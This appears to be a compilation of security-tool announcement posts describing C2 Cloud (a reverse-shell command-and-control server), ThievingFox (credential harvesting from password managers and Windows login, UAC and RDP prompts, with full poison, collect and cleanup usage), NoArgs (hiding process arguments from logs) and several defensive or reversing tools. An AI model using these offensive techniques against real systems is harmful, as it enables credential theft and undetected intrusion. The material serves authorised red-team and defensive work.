    C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

    Reverse shells support:

    1. Reverse TCP
    2. Reverse HTTP
    3. Reverse HTTPS (configure it behind an LB)
    4. Telegram C2

    Demo

    C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
    Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
    Telegram C2: https://youtu.be/WLQtF4hbCKk

    Key Features

🔒 Anywhere Access: Reach the C2 Cloud from any location.
🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

    Tech Stack

    πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
    πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
    🌐 Nginx: Effortlessly routing traffic between web and backend systems.
    πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
    πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
    πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

    Architecture

    Application setup

    • Management port: 9000
• Reverse HTTP port: 8000
    • Reverse TCP port: 8888

    • Clone the repo

• Optional: Update chat_id and bot_token in c2-telegram/config.yml
• Execute docker-compose up -d to start the containers. Note: the c2-api service will not start until the database is initialized; if you receive 500 errors, please retry after some time.

    Credits

    Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

    License

    Distributed under the MIT License. See LICENSE for more information.

    Contact



    OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

    By: Zion3R


    Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


    Features

1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks (a toy sketch of this signature-based scanning follows the list).

    2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

    3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

    4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
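As promised above, here is a toy sketch of that signature-based scanning; the patterns and output format are illustrative, not WLA-cli.py's actual rules:

import re

SIGNATURES = {
    "XSS": re.compile(r"<script|%3Cscript", re.I),
    "LFI": re.compile(r"\.\./|%2e%2e%2f", re.I),
    "RFI": re.compile(r"=(?:https?|ftp)://", re.I),
    "Scanner UA": re.compile(r"nikto|sqlmap|wpscan", re.I),
}

def analyze(path):
    # Walk the access log line by line and flag anything matching a signature.
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for attack, rx in SIGNATURES.items():
                if rx.search(line):
                    print(f"line {lineno}: possible {attack}: {line.strip()[:80]}")

analyze("LogSampls/access.log")  # the sample log shipped with the repo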

    Future Features

    This project is actively developed, and future features may include:

    1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
    2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

    Installation

    The tool only requires Python 3 at the moment.

1. git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
2. cd OSTE-Web-Log-Analyzer
3. python3 WLA-cli.py

    Usage

After cloning the repository to your local machine, you can start the application by executing python3 WLA-cli.py. A simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t

Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h

    Contact

LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228



    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

    The accompanying blog post can be found here


    Installation

    Linux

Rustup must be installed; follow the instructions available here: https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using:

    apt install mingw-w64

Both x86 and x86_64 Windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

After adding the Mono repositories, Nuget can be installed using apt:

    apt install nuget

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

    Windows

Rustup must be installed; follow the instructions available here: https://rustup.rs/

Both x86 and x86_64 Windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

A .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development".

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).

    Targets

All modules have been tested on the following Windows versions:

• Windows Server 2022
• Windows Server 2019
• Windows Server 2016
• Windows Server 2012R2
• Windows 10
• Windows 11

[!CAUTION] Modules have not been tested on other versions, and are expected not to work.

Application: Injection Method
• KeePass.exe: AppDomainManager Injection
• KeePassXC.exe: DLL Proxying
• LogonUI.exe (Windows Login Screen): COM Hijacking
• consent.exe (Windows UAC Popup): COM Hijacking
• mstsc.exe (Windows default RDP client): COM Hijacking
• RDCMan.exe (Sysinternals' RDP client): COM Hijacking
• MobaXTerm.exe (3rd party RDP client): COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).
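The HKCU-versus-HKCR distinction boils down to which registry path receives the hijack. An illustrative Python/winreg sketch, where the CLSID and DLL path are hypothetical placeholders rather than ThievingFox's real values:

import winreg

CLSID = "{00000000-0000-0000-0000-000000000000}"  # hypothetical hijacked CLSID
DLL = r"C:\Windows\Temp\ThievingFox\proxy.dll"    # hypothetical proxy library

def poison(hive, base):
    # Point the CLSID's InprocServer32 default value at the proxy DLL.
    path = base + f"CLSID\\{CLSID}\\InprocServer32"
    with winreg.CreateKey(hive, path) as key:
        winreg.SetValueEx(key, None, 0, winreg.REG_SZ, DLL)

# Default behaviour: per-user hijack, only users with a loaded HKCU hive.
poison(winreg.HKEY_CURRENT_USER, "Software\\Classes\\")
# --<app>-poison-hkcr equivalent: machine-wide, affects every user.
# poison(winreg.HKEY_CLASSES_ROOT, "")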

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

For each application specified in the command line parameters, the cleanup module first removes the poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

The cleanup module does not remove extracted credentials from the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisoning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisoning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisoning artifacts related to mstsc.exe
--consent Try to cleanup all poisoning artifacts related to Consent.exe
--logonui Try to cleanup all poisoning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisoning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisoning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisoning artifacts related to all applications

    Collect

For each application specified in the command line parameters, the collect module retrieves the output files corresponding to the application, stored on the remote host inside C:\Windows\Temp\<tempdir>, and decrypts them. The files are deleted from the remote host, and the retrieved data is stored in client/output/.

Multiple applications can be specified at once, or the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications
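
For example, a hypothetical run (credentials and target are placeholders) collecting KeePass and RDCMan logs from a single host:

python3 client/ThievingFox.py collect --keepass --rdcman 'domain/user:password@192.168.1.10'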


    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0, created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

    Features

    • Check the status of single or multiple URLs/domains.
• Asynchronous HTTP requests for improved performance (see the sketch after this list).
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.
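
To picture the asynchronous checking, here is a minimal sketch (an illustration using asyncio and aiohttp, not the tool's actual code):

import asyncio
import aiohttp

async def check(session, url):
    # Fetch one URL and report its HTTP status; -1 marks unreachable or invalid hosts.
    try:
        async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as resp:
            return url, resp.status
    except Exception:
        return url, -1

async def main(urls):
    async with aiohttp.ClientSession() as session:
        # Issue all requests concurrently instead of one at a time.
        results = await asyncio.gather(*(check(session, u) for u in urls))
    for url, status in results:
        print(f"{status}\t{url}")

asyncio.run(main(["https://example.com", "https://example.org"]))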

    Installation

    1. Clone the repository:

git clone https://github.com/your_username/status-checker.git
cd status-checker

2. Install dependencies:

pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

    By: Zion3R


Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. I am actively working on making the backend more reliable.


    Honorable Mentions

    Many of the Shodan queries have been sourced from other CTI researchers:

    Huge shoutout to them!

    Thanks to BertJanCyber for creating the KQL query for ingesting this feed

    And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

    What do I track?

    Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY.

    echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
    bash
    python3 -m pip install -r requirements.txt
    python3 tracker.py
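
Conceptually, the collection loop boils down to running saved Shodan queries and writing the matching IPs to per-tool files. A minimal sketch of that idea, using the official shodan Python library (the query and output file here are illustrative, not the repository's actual code):

import os
import shodan

api = shodan.Shodan(os.environ["SHODAN_API_KEY"])

# Illustrative query; the real feed maintains one saved query per tool/family.
query = 'product:"Cobalt Strike Beacon"'
ips = sorted({match["ip_str"] for match in api.search(query)["matches"]})

with open("data/example_tool.txt", "w") as f:
    f.write("\n".join(ips) + "\n")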

    Contributing

    I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

    References



    NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

    By: Zion3R


    NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


    Default Cmd:


    Windows Event Logs:


    Using NoArgs:


    Windows Event Logs:


    Functionality Overview

    The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

    Hooking Mechanism

    Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

    Process Environment Block (PEB) Manipulation

    The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

    Demo: Running Mimikatz and passing it the arguments:

    Process Hacker View:


All the arguments are hidden dynamically.

    Process Monitor View:


    Technical Implementation

1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for the obfuscated executable on the releases page.)

    2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

    3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

    4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

5. Execution Redirection: Upon completion of the manipulations, execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered are manipulated discreetly, evading detection and logging mechanisms that rely on getting the process details from the PEB.

    Installation and Usage:

    Option 1: Compile NoArgs DLL:

• You will need Microsoft Detours installed.

    • Compile the DLL.

    • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

    Option 2: Download the compiled executable (ready-to-go) from the releases page.

References:

    • https://en.wikipedia.org/wiki/Microsoft_Detours
    • https://github.com/microsoft/Detours
    • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
    • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


    Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

    By: Zion3R


This tool compilation is carefully crafted to be useful both for beginners and veterans of the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

    It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


    Advantages

To be clear, this pack aims to be the most complete and robust in existence. Some of the pros are:

    1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

2. The pack is integrated with a Universal Updater made by us from scratch. Thanks to that, we get to maintain all the tools in an automated fashion.

3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to add the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

    4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

    Installation

    1. You can simply download the stable versions from the release section, where you can also find the installer.

    2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
      You will find the binary in the folder bin\updater\updater.exe.

    Tool set

This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
    You can check the complete list of tools here.

    About contributions

Pull Requests are welcome. If you want to propose big changes, first create an Issue about it, so we can all analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



    R2Frida - Radare2 And Frida Better Together

    By: Zion3R


This is a self-contained plugin for radare2 that allows you to instrument remote processes using Frida.

The radare project provides a complete, well-maintained toolchain for reverse engineering whose features can be extended with other programming languages and tools.

    Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


    Features

    • Run unmodified Frida scripts (Use the :. command)
    • Execute snippets in C, Javascript or TypeScript in any process
    • Can attach, spawn or launch in local or remote systems
    • List sections, symbols, exports, protocols, classes, methods
    • Search for values in memory inside the agent or from the host
    • Replace method implementations or create hooks with short commands
    • Load libraries and frameworks in the target process
    • Support Dalvik, Java, ObjC, Swift and C interfaces
    • Manipulate file descriptors and environment variables
    • Send signals to the process, continue, breakpoints
    • The r2frida io plugin is also a filesystem fs and debug backend
• Automate r2 and frida using r2pipe (see the sketch after this list)
    • Read/Write process memory
    • Call functions, syscalls and raw code snippets
    • Connect to frida-server via usb or tcp/ip
    • Enumerate apps and processes
    • Trace registers, arguments of functions
    • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
    • Doesn't require frida to be installed in the host (no need for frida-tools)
    • Extend the r2frida commands with plugins that run in the agent
    • Change page permissions, patch code and data
    • Resolve symbols by name or address and import them as flags into r2
    • Run r2 commands in the host from the agent
    • Use r2 apis and run r2 commands inside the remote target process.
    • Native breakpoints using the :db api
    • Access remote filesystems using the r_fs api.
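
The r2pipe automation mentioned above can be as simple as the following sketch (assuming the r2pipe Python package is installed and a local frida-server or target is reachable):

import r2pipe

# Open an r2frida session against the local "pid 0" helper (same as `r2 frida://0`).
r2 = r2pipe.open("frida://0")

print(r2.cmd(":i"))   # target information (pid, name, arch, bits, ...)
print(r2.cmd(":dm"))  # memory maps of the instrumented process

r2.quit()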

    Installation

    The recommended way to install r2frida is via r2pm:

    $ r2pm -ci r2frida

Binary builds that don't require compilation will soon be supported in r2pm and r2env. Meanwhile, feel free to download the latest builds from the Releases page.

    Compilation

    Dependencies

    • radare2
    • pkg-config (not required on windows)
    • curl or wget
    • make, gcc
• npm, nodejs (will soon be removed)

    In GNU/Debian you will need to install the following packages:

    $ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

    Instructions

    $ git clone https://github.com/nowsecure/r2frida.git
    $ cd r2frida
    $ make
    $ make user-install

    Windows

    • Install meson and Visual Studio
    • Unzip the latest radare2 release zip in the r2frida root directory
    • Rename it to radare2 (instead of radare2-x.y.z)
• Run preconfigure.bat to make the VS compiler available in PATH
    • Run configure.bat and then make.bat
• Copy b\r2frida.dll into the directory shown by r2 -H R2_USER_PLUGINS

    Usage

For testing, use r2 frida://0, as attaching to PID 0 in Frida is a special session that runs locally. You can then run the :? command to get the list of available commands.

    $ r2 'frida://?'
    r2 frida://[action]/[link]/[device]/[target]
    * action = list | apps | attach | spawn | launch
    * link = local | usb | remote host:port
    * device = '' | host:port | device-id
    * target = pid | appname | process-name | program-in-path | abspath
    Local:
    * frida://? # show this help
    * frida:// # list local processes
    * frida://0 # attach to frida-helper (no spawn needed)
    * frida:///usr/local/bin/rax2 # abspath to spawn
    * frida://rax2 # same as above, considering local/bin is in PATH
    * frida://spawn/$(program) # spawn a new process in the current system
    * frida://attach/(target) # attach to target PID in current host
    USB:
    * frida://list/usb// # list processes in the first usb device
    * frida://apps/usb// # list apps in the first usb device
    * frida://attach/usb//12345 # attach to given pid in the first usb device
    * frida://spawn/usb//appname # spawn an app in the first resolved usb device
    * frida://launch/usb//appname # spawn+resume an app in the first usb device
    Remote:
    * frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
    Environment: (Use the `%` command to change the environment at runtime)
    R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
    R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
    R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
    R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

    Examples

    $ r2 frida://0     # same as frida -p 0, connects to a local session

You can attach, spawn, or launch any program by name or PID. The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line):

    $ r2 frida://rax2  # attach to the first process named `rax2`
    $ r2 frida://1234 # attach to the given pid

Using the absolute path of a binary will spawn the process:

    $ r2 frida:///bin/ls
    [0x00000000]> :dc # continue the execution of the target program

    Also works with arguments:

    $ r2 frida://"/bin/ls -al"

    For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

    $ r2 frida://spawn/usb/         # enumerate devices
    $ r2 frida://spawn/usb// # enumerate apps in the first iOS device
    $ r2 frida://spawn/usb//Weather # Run the weather app

    Commands

These are the most frequently used commands, so learn them, and suffix them with ? to get subcommand help.

    :i        # get information of the target (pid, name, home, arch, bits, ..)
    .:i* # import the target process details into local r2
    :? # show all the available commands
    :dm # list maps. Use ':dm|head' and seek to the program base address
    :iE # list the exports of the current binary (seek)
    :dt fread # trace the 'fread' function
    :dt-* # delete all traces

    Plugins

    r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

    See the plugins/ directory for some more example plugin scripts.

    [0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
    if (name === 'test') {
        return function(args) {
            console.log('Hello Args From r2frida plugin', args);
            return 'Things Happen';
        }
    }
});
    [0x00000000]> :. example.js # load the plugin script

The :. command works like r2's . command, but runs inside the agent.

    :. a.js  # run script which registers a plugin
    :. # list plugins
    :.-test # unload a plugin by name
    :.. a.js # eternalize script (keeps running after detach)

    Termux

If you want to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of symbol resolution. The way to make this work is to extend the LD_LIBRARY_PATH environment variable so that the system directory comes before the Termux libdir.

    $ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

    Troubleshooting

Ensure you are using a modern version of r2 (preferably the latest release or git).

Run r2 -L | grep frida to verify that the plugin is loaded. If nothing is printed, use the R2_DEBUG=1 environment variable to get some debugging messages and find out the reason.

If you have problems compiling r2frida, you can use r2env or fetch the release builds from the GitHub releases page. Bear in mind that only the MAJOR.MINOR version must match; that is, r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

    Design

+----------+
| radare2  |   The radare2 tool, on top of the rest
+----------+
     :
+----------+
| io_frida |   r2frida io plugin
+----------+
     :
+----------+
| frida    |   Frida host APIs and logic to interact with target
+----------+
     :
+----------+
| app      |   Target process instrumented by Frida with Javascript
+----------+

    Credits

    This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

I would like to thank Ole AndrΓ© for writing and maintaining Frida, as well as for being so kind as to proactively fix bugs and discuss technical details on anything needed to make this union work. Kudos!



    Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

    By: Zion3R


    Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

    Currently enumerates the following:

Amazon Web Services:
• Open / Protected S3 Buckets
• awsapps (WorkMail, WorkDocs, Connect, etc.)

Microsoft Azure:
• Storage Accounts
• Open Blob Storage Containers
• Hosted Databases
• Virtual Machines
• Web Apps

Google Cloud Platform:
• Open / Protected GCP Buckets
• Open / Protected Firebase Realtime Databases
• Google App Engine sites
• Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names)
• Open Firebase Apps


    See it in action in Codingo's video demo here.


    Usage

    Setup

Several non-standard libraries are required to support threaded HTTP requests and DNS lookups. You'll need to install the requirements as follows:

    pip3 install -r ./requirements.txt

    Running

    The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

    You can provide multiple keywords by specifying the -k argument multiple times.

    Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.
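
To picture the mutation step, here is a short sketch (illustrative only, not cloud_enum's actual implementation; the join styles are assumptions):

# Combine each keyword with each mutation string in a few common join styles.
def mutate(keywords, mutations):
    candidates = set(keywords)
    for kw in keywords:
        for m in mutations:
            candidates.update({f"{kw}{m}", f"{kw}-{m}", f"{m}{kw}", f"{m}-{kw}"})
    return sorted(candidates)

with open("enum_tools/fuzz.txt") as f:
    mutations = [line.strip() for line in f if line.strip()]

for name in mutate(["somecompany"], mutations)[:10]:
    print(name)  # candidate bucket/container names to probe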

